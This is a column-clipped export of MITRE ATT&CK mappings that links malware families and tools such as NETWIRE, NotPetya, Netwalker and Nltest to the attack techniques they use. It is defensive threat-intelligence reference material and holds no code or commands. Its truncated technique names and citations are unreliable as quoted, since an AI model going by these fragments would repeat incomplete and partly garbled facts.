S1047 Mori malware-- software uses T1070.004File Deleti attack-pat technique [Mori](http
S1047 Mori malware-- software uses T1001.001Junk Data attack-pat technique [Mori](htt
S1047 Mori malware-- software uses T1112 Modify Regattack-pat technique [Mori](htt
[Mori](https://attack.mitre.o
S1047 Mori malware-- software uses T1012 Query Regiattack-pat technique `HKLM\Software\NFC\`.(Citati
S1047 Mori malware-- software uses T1218.010Regsvr32 attack-pat technique [Mori](htt
S1047 Mori malware-- software uses T1132.001Standard Eattack-pat technique [Mori](htt
S1047 Mori malware-- software uses T1071.001Web Protocattack-pat technique [Mori](htt
S0256 Mosquito malware--9software uses T1546.015Componentattack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1027.013Encrypted/attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1070.004File Deleti attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1027.011Fileless St attack-pat technique [Mosquito]
S0256 Mosquito malware--9software uses T1105 Ingress Tooattack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1112 Modify Regattack-pat technique [Mosquito]
S0256 Mosquito malware--9software uses T1106 Native API attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1059.001PowerShellattack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1057 Process Di attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1547.001Registry Ruattack-pat technique [Mosquito]
S0256 Mosquito malware--9software uses T1218.011Rundll32 attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1518.001Security S attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1573.001Symmetric attack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1016 System Netattack-pat technique [Mosquito]
S0256 Mosquito malware--9software uses T1033 System Own attack-pat technique [Mosquito]
S0256 Mosquito malware--9software uses T1059.003Windows Cattack-pat technique [Mosquito](
S0256 Mosquito malware--9software uses T1047 Windows M attack-pat technique [Mosquito](
S1135 MultiLayermalware-- software uses T1070.001Clear Windattack-pat technique [MultiLaye
S1135 MultiLayermalware-- software uses T1485 Data Destrattack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1562.001Disable or attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1561.002Disk Struc attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1027.009Embeddedattack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1070.004File Deleti attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1083 File and Di attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1070 Indicator attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1490 Inhibit Sy attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1053.005Scheduled attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1565.001Stored Datattack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1529 System Sh attack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1070.006Timestompattack-pat technique [MultiLayer
S1135 MultiLayermalware-- software uses T1059.003Windows Cattack-pat technique [MultiLayer
S0699 Mythic tool--d505software uses T1573.002Asymmetricattack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1119 Automatedattack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1071.004DNS attack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1132 Data Encodattack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1030 Data Transfattack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1090.004Domain Froattack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1090.002External Prattack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1008 Fallback C attack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1071.002File Transf attack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1090.001Internal Prattack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1095 Non-Applicattack-pat technique [Mythic](h
S0699 Mythic tool--d505software uses T1572 Protocol T attack-pat technique [Mythic](ht
S0699 Mythic tool--d505software uses T1071.001Web Protocattack-pat technique [Mythic](ht
S0590 NBTscan tool--b63 software uses T1046 Network Seattack-pat technique [NBTscan](h
S0590 NBTscan tool--b63 software uses T1040 Network Snattack-pat technique [NBTscan](h
S0590 NBTscan tool--b63 software uses T1018 Remote Sysattack-pat technique [NBTscan](h
S0590 NBTscan tool--b63 software uses T1016 System Netattack-pat technique [NBTscan](h
S0590 NBTscan tool--b63 software uses T1033 System Own attack-pat technique [NBTscan](h
S0272 NDiskMonimalware-- software uses T1083 File and Di attack-pat technique [NDiskMonit
S0272 NDiskMonimalware-- software uses T1105 Ingress Tooattack-pat technique [NDiskMoni
S0272 NDiskMonimalware-- software uses T1573.001Symmetric attack-pat technique [NDiskMonit
S0272 NDiskMonimalware-- software uses T1082 System Inf attack-pat technique [NDiskMoni
S0272 NDiskMonimalware-- software uses T1033 System Own attack-pat technique [NDiskMoni
S0034 NETEAGLE malware--5software uses T1071 Applicationattack-pat technique Adversaries
S0034 NETEAGLE malware--5software uses T1568 Dynamic Reattack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1041 Exfiltratio attack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1008 Fallback C attack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1083 File and Di attack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1095 Non-Applicattack-pat technique If [NETEAGL
S0034 NETEAGLE malware--5software uses T1057 Process Di attack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1547.001Registry Ruattack-pat technique The "SCOUT
S0034 NETEAGLE malware--5software uses T1573.001Symmetric attack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1071.001Web Protocattack-pat technique [NETEAGLE](
S0034 NETEAGLE malware--5software uses T1059.003Windows Cattack-pat technique [NETEAGLE](
S0198 NETWIRE malware-- software uses T1010 Applicatio attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1560 Archive Coattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1560.003Archive vi attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1119 Automatedattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1555 Credential attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1555.003Credential attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1053.003Cron attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1573 Encrypted attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1083 File and Di attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1027.011Fileless St attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1564.001Hidden Fileattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1105 Ingress Tooattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1036.001Invalid Codattack-pat technique The [NETWIR
S0198 NETWIRE malware-- software uses T1056.001Keyloggingattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1543.001Launch Ageattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1074.001Local Data attack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1547.015Login Itemattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1204.002Malicious Fattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1204.001Malicious Lattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1036.005Match Legiattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1112 Modify Regattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1106 Native API attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1095 Non-Applicattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1027 Obfuscatedattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1059.001PowerShellattack-pat technique The [NETWI
S0198 NETWIRE malware-- software uses T1057 Process Di attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1055.012Process Hoattack-pat technique The [NETWI
S0198 NETWIRE malware-- software uses T1055 Process Injattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1090 Proxy attack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1547.001Registry Ruattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1053.005Scheduled attack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1113 Screen Capattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1027.002Software Pattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1566.001Spearphishattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1566.002Spearphishattack-pat technique [NETWIRE](h
S0198 NETWIRE malware-- software uses T1573.001Symmetric attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1082 System Inf attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1016 System Netattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1049 System Netattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1059.004Unix Shell attack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1059.005Visual Basiattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1071.001Web Protocattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1102 Web Servicattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1059.003Windows Cattack-pat technique [NETWIRE](
S0198 NETWIRE malware-- software uses T1547.013XDG Autostattack-pat technique [NETWIRE](
S1106 NGLite malware--7software uses T1090.003Multi-hop attack-pat technique [NGLite](ht
S1106 NGLite malware--7software uses T1573.001Symmetric attack-pat technique [NGLite](h
S1106 NGLite malware--7software uses T1016 System Netattack-pat technique [NGLite](ht
S1106 NGLite malware--7software uses T1033 System Own attack-pat technique [NGLite](h
S1106 NGLite malware--7software uses T1071.001Web Protocattack-pat technique [NGLite](ht
S1107 NKAbuse malware-- software uses T1053.003Cron attack-pat technique [NKAbuse](h
S1107 NKAbuse malware-- software uses T1016.001Internet C attack-pat technique [NKAbuse](h
S1107 NKAbuse malware-- software uses T1090.003Multi-hop attack-pat technique [NKAbuse](
S1107 NKAbuse malware-- software uses T1498 Network Deattack-pat technique [NKAbuse](h
S1107 NKAbuse malware-- software uses T1057 Process Di attack-pat technique [NKAbuse](h
S1107 NKAbuse malware-- software uses T1113 Screen Capattack-pat technique [NKAbuse](h
S1107 NKAbuse malware-- software uses T1082 System Inf attack-pat technique [NKAbuse](
S1107 NKAbuse malware-- software uses T1059.004Unix Shell attack-pat technique [NKAbuse](h
S0353 NOKKI malware-- software uses T1056.004Credential attack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1140 Deobfuscatattack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1070.004File Deleti attack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1071.002File Transf attack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1105 Ingress Tooattack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1074.001Local Data attack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1036.005Match Legiattack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1027 Obfuscatedattack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1547.001Registry Ruattack-pat technique [NOKKI](ht
S0353 NOKKI malware-- software uses T1218.011Rundll32 attack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1082 System Inf attack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1016 System Netattack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1033 System Own attack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1124 System Timattack-pat technique [NOKKI](htt
S0353 NOKKI malware-- software uses T1071.001Web Protocattack-pat technique [NOKKI](ht
S1131 NPPSPY tool--0630 software uses T1557 Adversary-attack-pat technique [NPPSPY](ht
S1131 NPPSPY tool--0630 software uses T1119 Automatedattack-pat technique [NPPSPY](ht
S1131 NPPSPY tool--0630 software uses T1005 Data from attack-pat technique [NPPSPY](ht
S1131 NPPSPY tool--0630 software uses T1656 Impersonatattack-pat technique [NPPSPY](h
S1131 NPPSPY tool--0630 software uses T1056 Input Capt attack-pat technique [NPPSPY](ht
S1131 NPPSPY tool--0630 software uses T1112 Modify Regattack-pat technique [NPPSPY](ht
S1131 NPPSPY tool--0630 software uses T1552 Unsecuredattack-pat technique [NPPSPY](ht
S0205 Naid malware-- software uses T1112 Modify Regattack-pat technique [Naid](http
S0205 Naid malware-- software uses T1082 System Inf attack-pat technique [Naid](http
S0205 Naid malware-- software uses T1016 System Netattack-pat technique [Naid](htt
S0205 Naid malware-- software uses T1543.003Windows Se attack-pat technique [Naid](http
S0228 NanHaiShumalware-- software uses T1071.004DNS attack-pat technique [NanHaiShu
S0228 NanHaiShumalware-- software uses T1562.001Disable or attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1027.013Encrypted/attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1070.004File Deleti attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1105 Ingress Tooattack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1059.007JavaScript attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1218.005Mshta attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1547.001Registry Ruattack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1082 System Inf attack-pat technique [NanHaiShu
S0228 NanHaiShumalware-- software uses T1016 System Netattack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1033 System Own attack-pat technique [NanHaiShu]
S0228 NanHaiShumalware-- software uses T1059.005Visual Basiattack-pat technique [NanHaiShu]
S0336 NanoCore malware-- software uses T1123 Audio Captattack-pat technique [NanoCore]
S0336 NanoCore malware-- software uses T1562.004Disable or attack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1562.001Disable or attack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1105 Ingress Tooattack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1056.001Keyloggingattack-pat technique [NanoCore]
S0336 NanoCore malware-- software uses T1112 Modify Regattack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1027 Obfuscatedattack-pat technique [NanoCore]
S0336 NanoCore malware-- software uses T1547.001Registry Ruattack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1573.001Symmetric attack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1016 System Netattack-pat technique [NanoCore](
S0336 NanoCore malware-- software uses T1125 Video Captattack-pat technique [NanoCore]
S0336 NanoCore malware-- software uses T1059.005Visual Basiattack-pat technique [NanoCore]
S0336 NanoCore malware-- software uses T1059.003Windows Cattack-pat technique [NanoCore]
S0637 NativeZon malware-- software uses T1140 Deobfuscatattack-pat technique [NativeZon
S0637 NativeZon malware-- software uses T1480 Execution attack-pat technique [NativeZone
S0637 NativeZon malware-- software uses T1204.002Malicious Fattack-pat technique [NativeZone
S0637 NativeZon malware-- software uses T1036 Masqueradattack-pat technique [NativeZon
S0637 NativeZon malware-- software uses T1218.011Rundll32 attack-pat technique [NativeZone
S0637 NativeZon malware-- software uses T1497.001System Cheattack-pat technique [NativeZon
S0247 NavRAT malware-- software uses T1105 Ingress Tooattack-pat technique [NavRAT](h
S0247 NavRAT malware-- software uses T1056.001Keyloggingattack-pat technique [NavRAT](h
S0247 NavRAT malware-- software uses T1074.001Local Data attack-pat technique [NavRAT](ht
S0247 NavRAT malware-- software uses T1071.003Mail Protocattack-pat technique [NavRAT](h
S0247 NavRAT malware-- software uses T1057 Process Di attack-pat technique [NavRAT](h
S0247 NavRAT malware-- software uses T1055 Process Injattack-pat technique [NavRAT](ht
S0247 NavRAT malware-- software uses T1547.001Registry Ruattack-pat technique [NavRAT](ht
S0247 NavRAT malware-- software uses T1082 System Inf attack-pat technique [NavRAT](h
S0247 NavRAT malware-- software uses T1059.003Windows Cattack-pat technique [NavRAT](h
S0630 Nebulae malware--2software uses T1574.002DLL Side-L attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1005 Data from attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1070.004File Deleti attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1083 File and Di attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1105 Ingress Tooattack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1036.004Masquerade attack-pat technique [Nebulae](
S0630 Nebulae malware--2software uses T1036.005Match Legiattack-pat technique [Nebulae](
S0630 Nebulae malware--2software uses T1106 Native API attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1095 Non-Applicattack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1057 Process Di attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1547.001Registry Ruattack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1573.001Symmetric attack-pat technique [Nebulae](
S0630 Nebulae malware--2software uses T1082 System Inf attack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1059.003Windows Cattack-pat technique [Nebulae](h
S0630 Nebulae malware--2software uses T1543.003Windows Se attack-pat technique [Nebulae](h
S0691 Neoichor malware-- software uses T1559.001Componentattack-pat technique [Neoichor]
S0691 Neoichor malware-- software uses T1005 Data from attack-pat technique [Neoichor](
S0691 Neoichor malware-- software uses T1070 Indicator attack-pat technique
S0691 Neoichor malware-- software uses T1105 Ingress Tooattack-pat technique [Neoichor]
S0691 Neoichor malware-- software uses T1016.001Internet C attack-pat technique [Neoichor](
S0691 Neoichor malware-- software uses T1112 Modify Regattack-pat technique [Neoichor]
S0691 Neoichor malware-- software uses T1082 System Inf attack-pat technique [Neoichor]
S0691 Neoichor malware-- software uses T1614.001System Lanattack-pat technique [Neoichor]
S0691 Neoichor malware-- software uses T1016 System Netattack-pat technique [Neoichor](
S0691 Neoichor malware-- software uses T1033 System Own attack-pat technique [Neoichor](
S0691 Neoichor malware-- software uses T1071.001Web Protocattack-pat technique [Neoichor]
S0210 Nerex malware-- software uses T1553.002Code Signi attack-pat technique [Nerex](htt
S0210 Nerex malware-- software uses T1105 Ingress Tooattack-pat technique [Nerex](ht
S0210 Nerex malware-- software uses T1112 Modify Regattack-pat technique [Nerex](htt
S0210 Nerex malware-- software uses T1543.003Windows Se attack-pat technique [Nerex](htt
S0039 Net tool--0334 software uses T1098.007Additional attack-pat technique The `net lo
S0039 Net tool--0334 software uses T1087.002Domain Acattack-pat technique [Net](http
S0039 Net tool--0334 software uses T1136.002Domain Acattack-pat technique The <code>
S0039 Net tool--0334 software uses T1069.002Domain Grattack-pat technique Commands s
S0039 Net tool--0334 software uses T1087.001Local Acco attack-pat technique Commands u
S0039 Net tool--0334 software uses T1136.001Local Acco attack-pat technique The <code>
S0039 Net tool--0334 software uses T1069.001Local Grouattack-pat technique Commands s
S0039 Net tool--0334 software uses T1070.005Network Shattack-pat technique The <code>
S0039 Net tool--0334 software uses T1135 Network Shattack-pat technique The <code>
S0039 Net tool--0334 software uses T1201 Password Pattack-pat technique The <code>
S0039 Net tool--0334 software uses T1018 Remote Sysattack-pat technique Commands s
S0039 Net tool--0334 software uses T1021.002SMB/Windo attack-pat technique Lateral mo
S0039 Net tool--0334 software uses T1569.002Service Ex attack-pat technique The <code>
S0039 Net tool--0334 software uses T1049 System Netattack-pat technique Commands s
S0039 Net tool--0334 software uses T1007 System Serattack-pat technique The <code>
S0039 Net tool--0334 software uses T1124 System Timattack-pat technique The <code>
S0056 Net Crawlemalware-- software uses T1003.001LSASS Memattack-pat technique [Net Crawle
S0056 Net Crawlemalware-- software uses T1110.002Password Cattack-pat technique [Net Crawle
S0056 Net Crawlemalware-- software uses T1021.002SMB/Windo attack-pat technique [Net Crawle
S0056 Net Crawlemalware-- software uses T1569.002Service Ex attack-pat technique [Net Crawle
S0033 NetTravelemalware--csoftware uses T1010 Applicatio attack-pat technique [NetTravele
S0033 NetTravelemalware--csoftware uses T1056.001Keyloggingattack-pat technique [NetTravele
S0457 Netwalker malware--7software uses T1027.010Command aOttack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1486 Data Encryattack-pat technique [Netwalker]
S0457 Netwalker malware--7software uses T1140 Deobfuscatattack-pat technique [Netwalker]
S0457 Netwalker malware--7software uses T1562.001Disable or attack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1055.001Dynamic-linattack-pat technique The [Netwal
S0457 Netwalker malware--7software uses T1027.009Embeddedattack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1105 Ingress Tooattack-pat technique Operators d
S0457 Netwalker malware--7software uses T1490 Inhibit Sy attack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1570 Lateral Tooattack-pat technique Operators
S0457 Netwalker malware--7software uses T1112 Modify Regattack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1106 Native API attack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1059.001PowerShellattack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1518.001Security S attack-pat technique [Netwalker]
S0457 Netwalker malware--7software uses T1569.002Service Ex attack-pat technique Operators d
S0457 Netwalker malware--7software uses T1489 Service Stoattack-pat technique [Netwalker
S0457 Netwalker malware--7software uses T1082 System Inf attack-pat technique [Netwalker]
S0457 Netwalker malware--7software uses T1059.003Windows Cattack-pat technique Operators d
S0457 Netwalker malware--7software uses T1047 Windows M attack-pat technique [Netwalker
S0118 Nidiran malware-- software uses T1105 Ingress Tooattack-pat technique [Nidiran](h
S0118 Nidiran malware-- software uses T1036.004Masquerade attack-pat technique [Nidiran](
S0118 Nidiran malware-- software uses T1543.003Windows Se attack-pat technique [Nidiran](
S1090 NightClub malware-- software uses T1010 Applicatio attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1123 Audio Captattack-pat technique [NightClub
S1090 NightClub malware-- software uses T1071.004DNS attack-pat technique [NightClub]
S1090 NightClub malware-- software uses T1005 Data from attack-pat technique [NightClub]
S1090 NightClub malware-- software uses T1041 Exfiltratio attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1083 File and Di attack-pat technique [NightClub]
S1090 NightClub malware-- software uses T1105 Ingress Tooattack-pat technique [NightClub]
S1090 NightClub malware-- software uses T1056.001Keyloggingattack-pat technique [NightClub
S1090 NightClub malware-- software uses T1074.001Local Data attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1071.003Mail Protocattack-pat technique [NightClub
S1090 NightClub malware-- software uses T1036.004Masquerade attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1036.005Match Legiattack-pat technique [NightClub
[NightClub](https://attack.mi
S1090 NightClub malware-- software uses T1112 Modify Regattack-pat technique
S1090 NightClub malware-- software uses T1106 Native API attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1132.002Non-Standaattack-pat technique [NightClub]
[NightClub](https://attack.mi
S1090 NightClub malware-- software uses T1027 Obfuscatedattack-pat technique
S1090 NightClub malware-- software uses T1120 Peripheral attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1057 Process Di attack-pat technique [NightClub
S1090 NightClub malware-- software uses T1113 Screen Capattack-pat technique [NightClub
S1090 NightClub malware-- software uses T1070.006Timestompattack-pat technique [NightClub
S1090 NightClub malware-- software uses T1543.003Windows Se attack-pat technique [NightClub
S1147 Nightdoor malware-- software uses T1071 Applicationattack-pat technique [Nightdoor
S1147 Nightdoor malware-- software uses T1140 Deobfuscatattack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1070.004File Deleti attack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1574 Hijack Exe attack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1057 Process Di attack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1053.005Scheduled attack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1497.001System Cheattack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1082 System Inf attack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1016 System Netattack-pat technique [Nightdoor
S1147 Nightdoor malware-- software uses T1033 System Own attack-pat technique [Nightdoor
S1147 Nightdoor malware-- software uses T1124 System Timattack-pat technique [Nightdoor]
S1147 Nightdoor malware-- software uses T1102 Web Servicattack-pat technique [Nightdoor
S1147 Nightdoor malware-- software uses T1059.003Windows Cattack-pat technique [Nightdoor
S1100 Ninja malware--0software uses T1574.002DLL Side-L attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1001 Data Obfusattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1140 Deobfuscatattack-pat technique The [Ninja
S1100 Ninja malware--0software uses T1027.013Encrypted/attack-pat technique The [Ninja]
S1100 Ninja malware--0software uses T1480.001Environmen attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1083 File and Di attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1559 Inter-Proc attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1090.001Internal Prattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1204.002Malicious Fattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1036.005Match Legiattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1090.003Multi-hop attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1106 Native API attack-pat technique The [Ninja]
S1100 Ninja malware--0software uses T1095 Non-Applicattack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1132.002Non-Standaattack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1057 Process Di attack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1055 Process Injattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1001.003Protocol o attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1218.011Rundll32 attack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1029 Scheduled attack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1566.003Spearphishiattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1573.001Symmetric attack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1082 System Inf attack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1016 System Netattack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1070.006Timestompattack-pat technique [Ninja](htt
S1100 Ninja malware--0software uses T1071.001Web Protocattack-pat technique [Ninja](ht
S1100 Ninja malware--0software uses T1543.003Windows Se attack-pat technique [Ninja](htt
S0359 Nltest tool--981a software uses T1482 Domain Truattack-pat technique [Nltest](h
S0359 Nltest tool--981a software uses T1018 Remote Sysattack-pat technique [Nltest](h
S0359 Nltest tool--981a software uses T1016 System Netattack-pat technique [Nltest](h
S0368 NotPetya malware-- software uses T1070.001Clear Windattack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1486 Data Encryattack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1210 Exploitatioattack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1083 File and Di attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1003.001LSASS Memattack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1078.003Local Acco attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1036 Masqueradattack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1218.011Rundll32 attack-pat technique [NotPetya]
S0368 NotPetya malware-- software uses T1021.002SMB/Windo attack-pat technique [NotPetya]
S0368 NotPetya malware-- software uses T1053.005Scheduled attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1518.001Security S attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1569.002Service Ex attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1529 System Sh attack-pat technique [NotPetya](
S0368 NotPetya malware-- software uses T1047 Windows M attack-pat technique [NotPetya]
S0138 OLDBAIT malware-- software uses T1555 Credential attack-pat technique [OLDBAIT](h
S0138 OLDBAIT malware-- software uses T1555.003Credential attack-pat technique [OLDBAIT](h
S0138 OLDBAIT malware-- software uses T1071.003Mail Protocattack-pat technique [OLDBAIT](h
S0138 OLDBAIT malware-- software uses T1036.005Match Legiattack-pat technique [OLDBAIT](h
S0138 OLDBAIT malware-- software uses T1027 Obfuscatedattack-pat technique [OLDBAIT](h
S0138 OLDBAIT malware-- software uses T1071.001Web Protocattack-pat technique [OLDBAIT](h
S0165 OSInfo malware--fsoftware uses T1087.002Domain Acattack-pat technique [OSInfo](h
S0165 OSInfo malware--fsoftware uses T1069.002Domain Grattack-pat technique [OSInfo](ht
S0165 OSInfo malware--fsoftware uses T1087.001Local Acco attack-pat technique [OSInfo](h
S0165 OSInfo malware--fsoftware uses T1069.001Local Grouattack-pat technique [OSInfo](h
S0165 OSInfo malware--fsoftware uses T1135 Network Shattack-pat technique [OSInfo](h
S0165 OSInfo malware--fsoftware uses T1012 Query Regiattack-pat technique [OSInfo](ht
S0165 OSInfo malware--fsoftware uses T1018 Remote Sysattack-pat technique [OSInfo](h
S0165 OSInfo malware--fsoftware uses T1082 System Inf attack-pat technique [OSInfo](ht
S0165 OSInfo malware--fsoftware uses T1016 System Netattack-pat technique [OSInfo](ht
S0165 OSInfo malware--fsoftware uses T1049 System Netattack-pat technique [OSInfo](h
